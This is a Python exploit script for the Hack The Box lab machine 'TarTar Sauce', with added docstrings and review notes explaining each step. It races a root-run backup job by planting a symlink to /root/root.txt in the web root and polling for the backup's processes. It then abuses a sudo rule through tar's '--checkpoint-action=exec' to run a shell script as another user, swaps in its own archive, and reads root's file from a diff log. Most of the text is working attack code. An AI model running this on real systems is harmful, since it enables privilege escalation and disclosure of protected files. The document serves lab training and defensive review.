- #!/usr/bin/env python
- #HtB.eu TarTar Sauce to root.txt python exploit
- from os import system
- import datetime
- import os
- import subprocess
- import time
# Process names the script polls for in `ps -e` output, plus the name of the
# archive it builds. The original declared each name with a module-level
# `global` statement; that is a no-op at module scope, so it is omitted here.
count = 0  # never read anywhere in the visible script
process_name = "backuperer"  # first process the script waits for
tarunnin = "tar"             # second process waited for
sleepyet = "sleep"           # third process waited for
wtdiff = "diff"              # last process waited for, before the file swap
maltar = "maltar.tar"        # archive written by create_mal_tar()
- #def cleanup():
- # tmp = os.popen("rm maltar.tar shell.sh")
- # print "clean slate bitches"
- # return
def create_simlink():
    """Plant a symlink to /root/root.txt inside the web root and log the result.

    Runs `ln -s` to create /var/www/html/boobies.txt, then lists the web root
    filtered by grep to confirm the entry exists. The ln output is discarded.

    Review note: the link itself grants nothing; it only matters if a more
    privileged process later reads through it. A job that archives or compares
    this directory as root should treat symlinks as data, not follow them.
    """
    os.popen("ln -s /root/root.txt /var/www/html/boobies.txt").read()
    listing = os.popen("ls -a /var/www/html/ | grep -E 'boobies.txt'").read()
    stamp = datetime.datetime.now()
    print("we made " + str(listing) + " at: " + str(stamp))
    print("")
def create_mal_tar():
    """Archive /var/www/html/ into the file named by `maltar` and log it.

    The tar invocation uses `z` (gzip), `v` (verbose), `c` (create), `P`
    (keep absolute member names) and `f` (output file). The verbose listing
    is read and discarded; a follow-up `ls -a` shows whether the archive
    exists. By default tar records a symlink as a link entry rather than
    archiving its target, so a link present in the web root at this moment
    is stored as a link.
    """
    archive_cmd = "tar zvcPf " + maltar + " /var/www/html/"
    os.popen(archive_cmd).read()
    present = os.popen("ls -a " + str(maltar)).read()
    stamp = datetime.datetime.now()
    print("file: " + str(present) + " created at: " + str(stamp))
    print("")
def rm_simlink():
    """Delete the symlink from the web root and print what grep still finds.

    After this call the live directory no longer contains boobies.txt, while
    the archive built by create_mal_tar() still does. That difference between
    the archive and the live tree is presumably what the later comparison
    step reports -- confirm against the backup job itself.
    """
    os.popen("rm /var/www/html/boobies.txt").read()
    leftover = os.popen("ls /var/www/html/ |grep boob*").read()
    print("is there boobie.txt? " + str(leftover))
    print("")
def check_process(prcssname):
    """Block until `prcssname` appears anywhere in the output of `ps -e`.

    Args:
        prcssname: text to look for. It is matched as a plain substring of
            the whole `ps -e` output, not as an exact process name.

    The loop has no delay between polls, so it spawns `ps` back to back until
    the match appears. Review note: that burst of short-lived `ps` children
    from one parent is visible in process-creation telemetry.
    """
    print("looking for " + prcssname + " at: " + str(datetime.datetime.now()))
    while prcssname not in os.popen("ps -e").read():
        pass  # poll again immediately
    seen_at = datetime.datetime.now()
    print(prcssname + " ran at: " + str(seen_at))
    print("")
def check_for_tmpfile():
    """Poll /var/tmp until a dot-file with a 10+ character name shows up.

    Stores the raw grep output in the module-level `tmpfile`. The value is
    kept exactly as read (no stripping or splitting), so it carries whatever
    newlines the shell pipeline emitted.

    Review note: the name being discoverable by an unprivileged `ls` means
    the file lives in a directory other users can list; a root job that
    stages work there is exposing it to every local account.
    """
    global tmpfile
    listing_cmd = "ls -a /var/tmp |grep -E '[.]\\w{10,}'"
    print("lets find that tmpfile name")
    while True:
        tmpfile = os.popen(listing_cmd).read()
        if tmpfile:
            break
        # empty output: nothing matched yet, keep trying
    found_at = datetime.datetime.now()
    print(tmpfile + " is the tmpfile name")
    print("found at: " + str(found_at))
    print("")
def tmpfile_check():
    """Debug helper: print the module-level `tmpfile` value.

    Not called anywhere in the visible script. Raises NameError if
    check_for_tmpfile() has not run yet, because `tmpfile` is only created
    there.
    """
    current = str(tmpfile)
    print("tmpfile variable really global? " + current)
    print("")
def makin_copies(newtar):
    """Write shell.sh, run it through `sudo -u onuma tar`, and print hashes.

    Args:
        newtar: used only in the progress message.

    Steps, in order: hash /var/tmp/<tmpfile>; append a shebang and a `cp`
    line (copying `maltar` over that file) to shell.sh; mark it executable;
    invoke tar as user onuma with a checkpoint action naming shell.sh; hash
    the file again. The two md5sum lines only show whether the file changed.
    All command strings are kept exactly as in the original.

    Review notes:
      * A sudoers rule that lets an account run tar as another user is
        equivalent to letting it run arbitrary commands as that user,
        because tar can execute programs via its checkpoint action.
      * The file being overwritten sits in /var/tmp between the moment a
        job creates it and the moment the job reads it back. Staging such
        files in a directory only the job's user can write to, or verifying
        them before use, removes that window.
      * shell.sh is opened with `>>`, so repeated runs keep appending.
    """
    started = datetime.datetime.now()
    hash_cmd = "md5sum /var/tmp/" + str(tmpfile)
    before = os.popen(hash_cmd).read()
    print("")
    print("hash for legit tar: " + str(before))
    print("")
    shebang = "#!/bin/bash"
    print("makin copies of " + str(newtar) + " at: " + str(started))
    os.popen("echo '" + str(shebang) + "' >> shell.sh").read()
    os.popen("echo 'cp " + maltar + " /var/tmp/" + tmpfile + "' >> shell.sh").read()
    os.popen("chmod +x ./shell.sh").read()
    os.popen("sudo -u onuma tar cf /tmp/archive.tar --checkpoint = 1 --checkpoint-action=exec=sh shell.sh").read()
    after = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
    print("new tar hash: " + str(after))
    print("")
def sleep_a_sec():
    """Pause for 15 seconds, printing a timestamp before and after.

    The closing message asks about "5 seconds" although the delay is 15; the
    text is kept as the original wrote it.
    """
    print("waiting 15 sec start now: " + str(datetime.datetime.now()))
    time.sleep(15)
    print("has it been 5 seconds?" + str(datetime.datetime.now()))
    print("")
def cat_log():
    """Print the `>` lines from the last 50 lines of the backup error log.

    Reads /var/backups/onuma_backup_error.txt. An earlier, commented-out
    variant grepped the whole file for boobies.txt instead. Lines starting
    with `>` are presumably diff output written by the backup job -- confirm
    against the job's script.

    Review note: if a privileged job writes file differences into a log that
    unprivileged users can read, the log discloses the compared content.
    Logging only file names, or restricting the log's mode, avoids that.
    """
    recent = os.popen("tail -n 50 /var/backups/onuma_backup_error.txt | grep \\>").read()
    print("hash should be near /")
    print("")
    print(str(recent))
    exit  # bare name, not a call: evaluates the builtin and does nothing
# Driver sequence. cleanup() stays disabled as in the original, so
# maltar.tar and shell.sh persist between runs.

# Recreate the scratch directory. The trailing `cd` runs inside the shell
# that os.popen spawns and does not change this process's working directory.
startshitright = os.popen("rmdir /var/tmp/.b && mkdir /var/tmp/.b && cd /var/tmp/.b").read()
print("started right")

# Build the archive while the symlink exists, then remove the link from the
# live web root.
create_simlink()
create_mal_tar()
rm_simlink()

# Wait for each process name in turn, pause, then look for the temp file.
for watched in (process_name, tarunnin, sleepyet):
    check_process(watched)
sleep_a_sec()
check_for_tmpfile()

# The original also tried calling makin_copies(tmpfile) before waiting for
# diff, and a fixed time.sleep(25) after it; both are left disabled.
check_process(wtdiff)
makin_copies(tmpfile)
cat_log()